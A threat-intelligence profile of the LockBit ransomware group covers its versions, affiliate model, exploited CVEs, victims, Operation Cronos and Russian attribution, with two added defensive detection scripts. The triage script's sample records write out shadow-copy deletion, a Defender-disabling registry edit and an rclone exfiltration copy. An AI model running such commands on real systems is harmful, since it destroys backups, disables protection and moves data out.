Executive Summary and Group Overview
LockBit is the most prolific ransomware-as-a-service (RaaS) ecosystem on record. First appearing in late 2019 as "ABCD ransomware," it evolved through six major code branches and maintained global dominance from 2021 through 2023, peaking at roughly 44% of all identified ransomware incidents and generating more than $120 million in confirmed ransom receipts. The U.S. Department of Justice attributed more than 2,000 confirmed victims across all critical infrastructure sectors and all major geographic regions except the CIS. A 10-country law enforcement coalition (Operation Cronos, February 2024) achieved an unprecedented disruption, seizing 34+ servers, 200+ cryptocurrency wallets, and more than 7,000 decryption keys. Despite this, LockBit rebuilt, releasing versions 4.0 (February 2025) and 5.0 (September 2025). A second blow arrived in May 2025 when an unknown actor hacked and defaced the LockBit admin panel, leaking an affiliate database covering December 2024 through April 2025. As of May 2026, LockBit remains a functioning RaaS with continuing technical development but a materially degraded brand, reduced affiliate confidence, and a market share well below its 2022 peak.
| Attribute | Detail |
|---|---|
| CrowdStrike designation | BITWISE SPIDER (developer of LockBit ransomware and StealBit exfiltration tool; not a parent-organization designator) |
| Secureworks designation | GOLD MYSTIC (operator of the LockBit RaaS scheme since mid-2019) |
| Trend Micro designation | Water Selkie |
| Mandiant / Google designation | No formal APT/FIN designation for the LockBit core; Mandiant tracks Evil Corp affiliates using LockBit as UNC2165 (a distinct cluster, not the LockBit operator group) |
| CISA / IC3 designation | "LockBit" and "LockBit 3.0" in StopRansomware advisories; no specific threat-cluster name |
| Lineage | Independent origin; no Conti parent-child relationship. LockBit Green (2023) incorporates leaked Conti source code but was developed as a variant, not a succession |
| Operational model | RaaS; 80/20 revenue split (80% affiliate, 20% operator) per Chainalysis and TRM Labs on-chain analysis |
| Extortion mechanic | Double extortion (encryption + data publication) from v2.0; triple extortion (adding DDoS/harassment) from v3.0 |
| Assessed jurisdiction | Russia (CONFIRMED: CIS avoidance code, Russian-language forums, identified operator Khoroshev from Voronezh, no domestic prosecution) |
| LE disruption status | Operation Cronos (Feb 2024) and anonymous admin panel breach (May 2025); operative but degraded as of May 2026 |
Lineage and Organizational Heritage
| Version | Also Known As | Period | Key Developments |
|---|---|---|---|
| LockBit 1.0 (ABCD) | ABCD Ransomware | Late 2019 – mid-2021 | Initial Windows encryptor; ".abcd" extension in earliest form; rebranded to "LockBit" Jan 2020; Linux/ESXi variant added Oct 2021 |
| LockBit 2.0 | LockBit Red | June 2021 – early 2022 | Mature RaaS model; integrated StealBit data-exfiltration tool; double extortion formalized; automated domain controller discovery; advertised as world's fastest encryptor |
| LockBit 3.0 | LockBit Black | March 2022 – 2024 | Major refactor; modular architecture; anti-analysis protections; code similarities with BlackMatter and ALPHV/BlackCat; triple extortion (DDoS/harassment); bug-bounty program; selective encryption |
| LockBit Green | — | Jan 2023+ | Hybrid variant incorporating leaked Conti source code (BCryptGenRandom for faster encryption); observed by vx-underground; distinct code branch, not a successor to 3.0 |
| LockBit 4.0 | — | Announced Dec 2024; released Feb 2025 | Post-Cronos rebuild; enhanced evasion; re-architected affiliate portal with new onion domains and access keys; announced from existing LockBit 3.0 site per Deep Instinct |
| LockBit 5.0 | — | Announced and released Sep 2025 | Sixth-anniversary release; Windows/Linux/ESXi variants confirmed by Trend Micro; randomized 16-character file extensions; faster encryption; removal of infection markers; better affiliate UI; enhanced obfuscation and anti-analysis |
The following pillars address the contested question of whether post-Cronos LockBit (4.0/5.0) represents the same operator cluster or a partial splinter. Code continuity is not contested; human continuity is the open question.
LockBit 3.0 / Black shares documented technical similarities with BlackMatter and ALPHV/BlackCat in configuration structures and specific routines. Multiple vendors confirm these similarities, but the interpretation remains contested: some assess code borrowing or licensing, others assess convergent design by developers familiar with the same code base. There is no confirmed evidence of a unified actor behind all three families. Confidence: CREDIBLE for the technical similarity; ANALYST INFERENCE for any shared authorship or collaboration.
Operational Model
LockBit operates a pure RaaS model. A core developer team maintains encryptors, infrastructure, and affiliate portals while independent affiliates supply initial access, deploy the malware, and manage victim negotiations. Revenue is split 80% to affiliates and 20% to the LockBit operator tier, per Chainalysis on-chain analysis confirmed by TRM Labs. DOJ reporting confirmed that 114 affiliates paid to join the LockBit program as of February 2024. The operator tier collects fees passively; affiliate wallets receive victim payments first, with the operator share extracted via the built-in split mechanism.
LockBit has recruited on Russian-language underground forums, emphasizing speed, automation, and affiliate-friendly terms. Vetting is described in open sources as moderate, with preference for affiliates who can demonstrate prior access capabilities and ability to deliver large enterprise victims. Some leak data suggests blacklisting of unreliable partners. Confidence: CREDIBLE (single-source / limited open corroboration on vetting specifics).
The bug-bounty program launched with LockBit 3.0 offered financial rewards for identification of vulnerabilities in the ransomware and its infrastructure, reflecting an unusual professionalization effort and likely an attempt to address leaks and security failures.
- Initial demands: Hundreds of thousands to multiple millions USD; IBM reported an average payment of approximately $1.5 million for LockBit 3.0 in 2022
- Time-limited discounts: Affiliates commonly offer 20-50% reductions if paid within days of initial demand
- Escalation ladder: Countdown timers, data sampling, threat to contact customers or regulators, DDoS attacks (3.0+), and full publication
- Multi-extortion from 3.0: Triple extortion adds DDoS or targeted harassment of victims alongside encryption and data publication threats
- Communication channel: TOR-hosted chat portal linked from ransom note via unique victim ID; some affiliates also used email and secure messaging
| Version | Encryption | Data Leak Threat | DDoS/Harassment | Notes |
|---|---|---|---|---|
| LockBit 1.0 | Yes | Limited | No | Early variant; single extortion primary |
| LockBit 2.0 | Yes | Yes (StealBit) | No | Double extortion systematized; StealBit introduced |
| LockBit 3.0 / Black | Yes | Yes | Yes | Triple extortion; bug bounty; DDoS add-on service |
| LockBit Green | Yes | Yes | Yes | Conti-derived; cloud service targeting |
| LockBit 4.0 | Yes | Yes | Yes | Post-Cronos rebuild; quiet-mode operation added |
| LockBit 5.0 | Yes | Yes | Yes | Refreshed affiliate incentive model; enhanced evasion |
Technical Capabilities
| CVE | Affected Product | Type | Confidence | Source |
|---|---|---|---|---|
| CVE-2023-4966 | Citrix NetScaler ADC / NetScaler Gateway | Session hijack / MFA bypass ("Citrix Bleed") | Confirmed | CISA AA23-325A; joint advisory FBI, MS-ISAC, ASD's ACSC |
| CVE-2021-44228 | Apache Log4j2 | Remote code execution (Log4Shell) | Confirmed | CISA advisory AA23-165A |
| CVE-2020-1472 | Microsoft Netlogon | Privilege escalation (Zerologon) | Confirmed | CISA advisory AA23-165A |
| CVE-2018-13379 | Fortinet FortiOS SSL VPN | Path traversal / credential access | Confirmed | CISA advisory AA23-165A |
| CVE-2021-34473 / 34523 / 31207 | Microsoft Exchange Server | Remote code execution (ProxyShell chain) | Credible | CISA advisory; multiple TI vendor reports |
| CVE-2021-36942 | Windows LSA | Forced authentication spoofing | Credible | Qualys Threat Research Unit; CISA advisory |
| CVE-2023-27350 / 27351 | PaperCut MF/NG | Unauthenticated RCE / information disclosure | Credible | Multiple vendor reports; CISA KEV |
| CVE-2019-0708 | Windows Remote Desktop Services | Remote code execution (BlueKeep) | Credible | Qualys Threat Research Unit |
Note: LockBit is a RaaS, so CVE exploitation reflects affiliate tradecraft, not a single actor. Not all CVEs above are used in every LockBit campaign. Attribution of a specific CVE to "LockBit" means it has been documented in campaigns by LockBit affiliates.
- Compromised credentials / RDP exploitation: Brute-forcing or purchasing credentials for RDP and VPN; the most consistent vector across all affiliate-tier operators
- Vulnerability exploitation: Edge device and appliance CVEs (see table above); Citrix Bleed (CVE-2023-4966) associated with multiple high-profile 2023 victims including Boeing and ICBC
- Phishing: Email-borne malware or credential-harvesting campaigns; used by certain affiliates as a preferred entry method
- MSP and supply-chain compromise: Documented cases of abusing trusted remote management tools operated by managed service providers
- Domain admin credential leverage to push payloads via PsExec, SMB shares, and Group Policy Objects
- Disabling security tools and services via PowerShell, Group Policy, and registry edits prior to deployment
- Living-off-the-land (LOTL) techniques using built-in Windows tools
- Automated network share and domain controller discovery (introduced with v2.0); accelerates spread across Windows domains
- StealBit exfiltration tool (v2.0+): custom-built tool for high-speed data theft prior to encryption; all StealBit servers seized in Operation Cronos
- rclone used as supplementary exfiltration mechanism for cloud storage staging
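Added example (not code from the profile or from any vendor): a small triage pass that runs the lateral-movement, defense-evasion and exfiltration behaviours listed above (PsExec service execution, shadow-copy deletion, registry-based tampering with security tooling, rclone staging) against process-creation records. The records, host names and command lines are constructed for illustration and are not real telemetry.

```python
import re
from collections import defaultdict

# Constructed process-creation records: (host, parent image, image, command line).
# Hosts and paths are hypothetical; nothing here comes from a real incident.
SAMPLE_PROCESSES = [
    ("DC01", r"C:\Windows\System32\services.exe", r"C:\Windows\PSEXESVC.exe",
     "PSEXESVC.exe"),
    ("FS01", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\vssadmin.exe",
     "vssadmin delete shadows /all /quiet"),
    ("FS01", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\reg.exe",
     r'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f'),
    ("FS01", r"C:\Windows\explorer.exe", r"C:\Tools\rclone.exe",
     r"rclone copy D:\shares\finance remote:staging --transfers 32"),
    ("WS12", r"C:\Windows\explorer.exe", r"C:\Program Files\Microsoft Office\winword.exe",
     "winword.exe /n"),
    ("WS12", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\vssadmin.exe",
     "vssadmin list shadows"),  # benign read-only use; must not fire
]

# Each rule: (id, description, image pattern, optional command-line pattern).
RULES = [
    ("psexec_service", "PsExec service binary executed (payload push via PsExec)",
     re.compile(r"(^|\\)PSEXESVC\.exe$", re.I), None),
    ("shadow_copy_delete", "Volume Shadow Copy deletion ahead of encryption",
     re.compile(r"\\vssadmin\.exe$", re.I), re.compile(r"delete\s+shadows", re.I)),
    ("defender_registry", "Security tooling disabled through a registry edit",
     re.compile(r"\\reg\.exe$", re.I), re.compile(r"\badd\b.*Windows Defender", re.I)),
    ("rclone_exfil", "rclone transfer toward a configured remote (exfiltration staging)",
     re.compile(r"\\rclone\.exe$", re.I), re.compile(r"\b(copy|sync|move)\b", re.I)),
]


def triage(processes):
    """Apply every rule to every record; return {host: [rule ids that fired]}."""
    hits = defaultdict(list)
    for host, _parent, image, cmdline in processes:
        for rule_id, _desc, image_re, cmd_re in RULES:
            if not image_re.search(image):
                continue
            if cmd_re is not None and not cmd_re.search(cmdline):
                continue
            hits[host].append(rule_id)
    return dict(hits)


def prioritize(hits, min_distinct=2):
    """Hosts where several distinct behaviours chain together are escalated first:
    a single PsExec launch is noisy on its own, but shadow-copy deletion plus
    tooling tampering plus rclone on one host is the pre-encryption pattern."""
    ranked = [h for h, rules in hits.items() if len(set(rules)) >= min_distinct]
    return sorted(ranked, key=lambda h: -len(set(hits[h])))


if __name__ == "__main__":
    found = triage(SAMPLE_PROCESSES)
    for host in prioritize(found):
        print(host, sorted(set(found[host])))
```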
All LockBit versions use a hybrid encryption scheme: symmetric encryption (typically AES) for file content combined with asymmetric encryption (RSA or ECC) for key protection. The per-file or per-session symmetric keys are wrapped with a public key embedded in the payload; the matching private keys are held by the operator tier, which is why recovery depends on keys seized from or surrendered by that tier.
- v1.0 / v2.0: Multi-threaded encryption for speed; v2.0 marketed as the fastest available at release; Volume Shadow Copy deletion
- v3.0 / Black: Selective encryption (partial file encryption to prioritize critical data while maximizing speed); packed binaries; control-flow obfuscation; anti-debugging checks
- Green variant: BCryptGenRandom for faster key generation, derived from Conti source code
- v5.0: Randomized 16-character file extensions; further removal of infection markers; enhanced cross-platform obfuscation per Trend Micro analysis
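Added example (not from the profile or from Trend Micro's analysis): a file-rename heuristic for the two extension behaviours the profile describes, the fixed ".abcd" extension of the earliest variant and the randomized 16-character extensions of v5.0. A burst of renames on one host to distinct, high-entropy, same-length extensions is the signal; the events, hosts and extensions below are constructed, and the window and threshold values are assumptions to tune per environment.

```python
import math
import ntpath
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed file-rename events: (host, ISO timestamp, new path). Not real telemetry.
SAMPLE_EVENTS = [
    ("FS01", "2025-10-01T02:14:03", r"D:\shares\finance\q3.xlsx.kq8Xz3pLw2Vb9nRt"),
    ("FS01", "2025-10-01T02:14:03", r"D:\shares\finance\budget.docx.P7mW2dQx9aLc4ZrK"),
    ("FS01", "2025-10-01T02:14:04", r"D:\shares\finance\ap.csv.Hd3Vk9Tq2Lm8Rx5B"),
    ("FS01", "2025-10-01T02:14:05", r"D:\shares\hr\roster.pdf.z4Kq7Wm2Np9Rt3Yx"),
    ("FS01", "2025-10-01T02:14:06", r"D:\shares\hr\policy.pdf.c8Nm3Xp7Qw2Lz5Vk"),
    ("FS02", "2025-10-01T02:20:00", r"C:\Users\jsmith\report.docx.tmp"),   # benign
    ("FS02", "2025-10-01T02:21:00", r"C:\Users\jsmith\notes.txt.bak"),     # benign
    ("WS07", "2020-02-11T09:30:00", r"C:\Users\afox\invoice.pdf.abcd"),    # fixed marker
]

# Fixed extension named in the profile for the earliest (ABCD) variant.
FIXED_EXTENSIONS = {".abcd"}


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character; 16 distinct characters give exactly 4.0."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def is_random_extension(ext: str, length: int = 16, min_entropy: float = 3.0) -> bool:
    """Same length as the v5.0 scheme, alphanumeric, and not a low-entropy filler."""
    body = ext.lstrip(".")
    return len(body) == length and body.isalnum() and shannon_entropy(body) >= min_entropy


def classify_extension(path: str) -> str:
    """Return 'fixed', 'random' or 'benign' for the path's final extension."""
    ext = ntpath.splitext(path)[1]  # ntpath handles Windows separators on any OS
    if ext.lower() in FIXED_EXTENSIONS:
        return "fixed"
    if is_random_extension(ext):
        return "random"
    return "benign"


def detect_extension_bursts(events, window_seconds: int = 60, min_files: int = 5):
    """One alert per host that renames >= min_files files to random-looking
    extensions inside window_seconds, plus one alert per fixed-extension hit."""
    alerts, by_host = [], defaultdict(list)
    for host, ts, path in events:
        kind = classify_extension(path)
        if kind == "fixed":
            alerts.append({"host": host, "kind": "fixed", "path": path})
        elif kind == "random":
            by_host[host].append((datetime.fromisoformat(ts), path))
    window = timedelta(seconds=window_seconds)
    for host, hits in by_host.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):
            in_window = [p for t, p in hits[i:] if t - start <= window]
            if len(in_window) >= min_files:
                alerts.append({"host": host, "kind": "random_burst",
                               "count": len(in_window), "sample": in_window[:3]})
                break
    return alerts
```

A plain length check alone is not enough: a 16-character extension of repeated characters has near-zero entropy and is treated as benign, while legitimately long extensions on backup or temp files rarely appear five times within a minute on one host.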
| Platform | First Version | Current Status | Notes |
|---|---|---|---|
| Windows | v1.0 (2019) | Full support, all versions | Core target; extensive domain automation |
| Linux / VMware ESXi | v1.0 (Oct 2021) | Full support, v3.0 through v5.0 | Targets virtual disk files; shuts down VMs before encryption |
| macOS | Observed Apr 2023 | Limited / experimental | Samples found on VirusTotal; operational use not confirmed at scale |
Financial Infrastructure
LockBit predominantly uses Bitcoin for ransom payments, with Monero available in some affiliate arrangements for added privacy. Victim payments go to affiliate-controlled wallets specified in negotiation chats, with the 20% operator share extracted through the built-in affiliate panel mechanism. TRM Labs confirmed this 80/20 split via on-chain analysis of payment flow clusters. DOJ attributed more than $120 million in confirmed ransom receipts through February 2024; TRM Labs documented at least $44 million in 2022 alone.
OFAC designated Dmitry Yuryevich Khoroshev ("LockBitSupp") and associated wallets on May 7, 2024, in coordination with the UK National Crime Agency and Australian Federal Police. Additional wallet clusters linked to LockBit affiliates have been designated over time. Analysts should expect ongoing OFAC designations as new wallets are linked via blockchain forensics; however, many affiliate-level wallets will remain undesignated and overlap with unrelated criminal activity.
Victim Profile and Targeting
LockBit's growth trajectory from market entrant to dominant player spans four years:
- LockBit 1.0 (2020): Approximately 5% of global ransomware attacks in its first operational year (IBM)
- LockBit 2.0 (2021): Rose to approximately 10% of global ransomware attacks
- LockBit 3.0 (2022): Exceeded 20% of global attacks; Akamai research recorded 39% of total ransomware victims in one measured period, triple the next-highest group
- 2023: NCC Group recorded more than 1,000 LockBit victims, equaling 22% of all identified ransomware victims that year; separately assessed at up to 44% of all global ransomware incidents at peak
- Post-Cronos (2024-2026): Market share declined; LockBit remained the top actor by victim count in May 2024 (10% of attacks per Infosecurity Magazine) but at substantially reduced absolute and relative volume
| Dimension | Detail | Confidence |
|---|---|---|
| Primary sectors | Manufacturing, healthcare, government/public sector, education, financial services, energy, professional services, transportation | CONFIRMED (CISA advisory AA23-165A; DOJ) |
| Target size | SMBs, mid-market, and large enterprises; focus on organizations with sufficient revenue to pay meaningful ransoms; high-profile cases skew to large enterprises and critical infrastructure | CONFIRMED |
| Geography | North America (US primary), Europe, Asia-Pacific, Latin America; CIS countries excluded (code-level and observed victim geography) | CONFIRMED |
| CIS exclusion | Russia, Belarus, and most CIS nations are excluded by both technical locale checks and observed victim lists | CONFIRMED |
| Stated targeting rules | LockBit publicly claims to avoid some hospitals and charities; empirical data shows numerous healthcare and public-sector victims, indicating rules are inconsistently enforced by affiliates | CONFIRMED (inconsistency) |
| Victim | Sector | Date | Notes |
|---|---|---|---|
| Royal Mail (UK) | Postal / logistics | Jan 2023 | Major national disruption; LockBit 3.0 affiliate; Royal Mail refused to pay; data published |
| TSMC (via supplier) | Semiconductor | Jun 2023 | LockBit claimed breach via third-party supplier; TSMC confirmed supplier incident; $70M demand |
| Boeing | Aerospace / defense | Nov 2023 | CVE-2023-4966 (Citrix Bleed) exploitation confirmed; Boeing Distribution Inc. unit; data published after non-payment |
| ICBC (Industrial and Commercial Bank of China) | Finance | Nov 2023 | US clearing operations disrupted; LockBit 3.0 affiliate; CVE-2023-4966 vector |
| Allen & Overy | Legal services | Nov 2023 | Major international law firm; data publishing threatened |
| DP World | Logistics / ports | Nov 2023 | Australian ports operator; significant operational disruption |
| Fulton County, Georgia (US) | Government | Jan 2024 | US state court system disrupted for weeks during Trump criminal case proceedings |
| India National Aerospace Laboratories | Aerospace / defense | Nov 2023 | State-owned research organization; LockBit 3.0 |
Law Enforcement and Regulatory Response
| Individual | Alias(es) | Nationality | Action | Status (May 2026) |
|---|---|---|---|---|
| Dmitry Yuryevich Khoroshev | LockBitSupp, LockBit, putinkrab | Russian (Voronezh) | 26-count indictment (NJ grand jury), OFAC sanction, $10M State Dept. reward; identified May 7, 2024 | At large; in Russia; warrant outstanding |
| Artur Sungatov | — | Russian | Indicted for deploying LockBit; unsealed February 20, 2024 | At large |
| Ivan Gennadievich Kondratiev | Bassterlord | Russian | Indicted for deploying LockBit against US and global businesses; unsealed February 20, 2024 | At large |
| Mikhail Vasiliev | — | Russian / Canadian | Charged prior to Cronos; arrested in Canada | Canadian custody; awaiting US extradition |
| Ruslan Magomedovich Astamirov | — | Russian | Charged; arrested | US custody; awaiting trial |
| Mikhail Pavlovich Matveev | Wazawaka | Russian | Indicted; $10M US bounty; believed in Kaliningrad | At large; not apprehended |
| Unnamed developer | — | Unconfirmed | Arrested by Europol August 2024 while traveling outside Russia | In custody |
| Two unnamed members | — | Unconfirmed | Arrested by NCA (one money laundering, one LockBit affiliation) 2024 | In custody |
| Unnamed BPH administrator | — | Unconfirmed | Arrested at Madrid airport by Spanish Guardia Civil 2024 | In custody |
| Two unnamed affiliates | — | Unconfirmed | Arrested in Poland and Ukraine on French judicial request, February 2024 | In custody |
| Date | Action | Agency | Impact |
|---|---|---|---|
| Feb 19-20, 2024 | Operation Cronos Phase 1: Infrastructure seizure | NCA, FBI, Europol, 10-country task force | 34+ servers seized; 11,000+ domains taken down; 200+ crypto wallets frozen; DLS replaced; 7,000+ decryption keys obtained; StealBit servers offline; all LockBit 3.0 affiliate accounts identified; 2 affiliates arrested (Poland, Ukraine) |
| Feb 20, 2024 | DOJ unseals indictments | US DOJ | Artur Sungatov and Ivan Kondratiev (Bassterlord) charged; prior charges against Vasiliev, Astamirov, Matveev confirmed |
| May 7, 2024 | Operation Cronos Phase 2: Leadership identification and sanction | DOJ, OFAC, NCA, Australian Federal Police | Dmitry Khoroshev unmasked as LockBitSupp; 26-count indictment; OFAC sanction; $10M State Dept. reward; additional wallets frozen |
| Aug-Oct 2024 | Additional arrests (four individuals) | Europol, NCA, Spanish Guardia Civil | Developer arrested while traveling; two NCA arrests; BPH admin arrested in Madrid |
| Oct 2024 | Evil Corp sanctions | UK, US, Australia | 15 Evil Corp members sanctioned; some with documented LockBit affiliate overlap |
| May 7, 2025 | Anonymous admin panel breach | Unknown actor | LockBit TOR site defaced: "Don't do crime CRIME IS BAD xoxo from Prague"; MySQL database dumped (paneldb_dump.zip); negotiation chats, wallet addresses, affiliate credentials, and build configs exposed for Dec 2024 to Apr 2025 period |
- Free LockBit 3.0 Black decryptor developed by Japanese Police with Europol support; available at nomoreransom.org
- 7,000+ decryption keys available to victims through lockbitvictims.ic3.gov (FBI IC3 portal)
- Keys are incident-specific; not all keys restore all victims; matching requires contact with FBI or NCA
- No universal decryptor exists for LockBit 4.0 or 5.0 variants as of May 2026
Attribution and State Nexus
- Named operator: Dmitry Yuryevich Khoroshev is a Russian national from Voronezh, Russia; identified by DOJ, OFAC, and NCA via a converging investigation (CONFIRMED)
- CIS avoidance: Code-level locale and keyboard checks exclude Russian/CIS systems; observed victim geography consistently excludes Russia and most CIS countries (CONFIRMED)
- Forum presence: LockBit recruitment and operations advertised on Russian-language cybercrime forums (CONFIRMED)
- No domestic prosecution: No public evidence of Russian authorities charging any LockBit operator despite global impact, consistent with tolerated-cybercrime patterns (CONFIRMED)
- Named affiliates: Multiple charged individuals are Russian nationals; others assessed as Russian-speaking based on operational communications (CONFIRMED for named; CREDIBLE for broader affiliate pool)
Open sources and government advisories do not provide conclusive evidence that LockBit is directed by or operating under the control of the FSB, SVR, or GRU. The most defensible assessment is that LockBit is a financially motivated, Russian-language cybercriminal ecosystem operating from jurisdictions that provide practical safe harbor, with de facto tolerance from Russian authorities in exchange for avoiding domestic targeting.
Three indicators suggest proximity to, but not control by, Russian state interests:
- Colonel Cassad donation: Chainalysis analysis identified a LockBit administrator donating cryptocurrency to "Colonel Cassad," a pro-Russia military journalist in Sevastopol with documented ties to Russian nationalist networks. This is the single most operationally significant indicator of informal state-proximate behavior (CREDIBLE for the transfer; ANALYST INFERENCE for its significance)
- Evil Corp affiliate overlap: Mandiant tracked UNC2165, a cluster of Evil Corp-affiliated operators, as shifting to LockBit to evade US sanctions. Evil Corp itself has documented direct FSB connections per US government indictments. The overlap does not make LockBit an FSB asset, but it places FSB-connected actors within the LockBit affiliate ecosystem (CONFIRMED overlap; ANALYST INFERENCE for implications)
- Data intelligence value: The sectors and organizations targeted by LockBit affiliates include defense contractors, aerospace organizations, government systems, and critical infrastructure that would have intelligence value for the Russian state. Whether any stolen data is shared with Russian intelligence is not documented in open sources (ANALYST INFERENCE)
Trajectory Assessment
LockBit has not undergone a formal rebranding; the core brand has been maintained across all versions. Post-Cronos, versions 4.0 and 5.0 represent version-number escalation as a credibility signal to potential affiliates rather than a substantive identity change. The continued use of the LockBit brand name is operationally significant: it carries recognition that attracts affiliates but also makes the group a persistent high-priority law-enforcement target. The decision to maintain the brand rather than rebrand (as many disrupted groups do) suggests either operator confidence in resilience or recognition that a new brand would not carry the same affiliate recruitment value.
| Connected Group | Relationship Type | Confidence | Notes |
|---|---|---|---|
| Conti (via LockBit Green) | Code acquisition: LockBit Green incorporates leaked Conti source code | CONFIRMED | Not a parent-child relationship; reflects code availability post-2022 Conti leak. Mandiant and others corroborate |
| Evil Corp / UNC2165 | Affiliate overlap: Evil Corp-linked operators used LockBit to evade sanctions | CONFIRMED | Mandiant tracked UNC2165 as Evil Corp cluster shifting to LockBit 3.0; Evil Corp has documented FSB connections per US DOJ indictments |
| BlackMatter / ALPHV-BlackCat | Code similarities: shared configuration structures and routines with LockBit 3.0 / Black | CREDIBLE | Multiple vendors confirm technical overlap; interpretation (code borrowing vs. shared authorship) remains contested; no confirmed unified actor |
| Qilin / DragonForce | Possible affiliate overlap and infrastructure sharing post-Cronos | LOW CONFIDENCE | Limited open-source evidence; primarily forum-based and infrastructure overlap observations. Mandiant and Recorded Future have not published formal assessments as of May 2026 |
- Continued development: LockBit 5.0 (September 2025) demonstrates ongoing technical investment and operator capability; cross-platform support and anti-analysis improvements indicate the developer tier remains active
- Revenue contraction: $2.3M total in five post-Cronos months (Dec 2024 to Apr 2025) versus $44M in 2022 alone represents an approximate 80-90% revenue decline from peak; this is the sharpest measurable indicator of ecosystem degradation
- Market share erosion: Competitor RaaS operations (Akira, Qilin, DragonForce, others) have gained affiliates following Cronos; LockBit no longer dominates the ransomware landscape as it did in 2022-2023
- Brand risk: Two major public compromises in fourteen months create structural affiliate confidence problems; the May 2025 breach exposed not just infrastructure but the security of the affiliate relationship itself
- Cumulative law enforcement pressure: No other ransomware group has faced simultaneous infrastructure seizure, leadership identification/sanction, decryptor release, and a secondary anonymous breach within a 15-month period; the combined effect on LockBit's ability to recruit credible affiliates is assessed as significant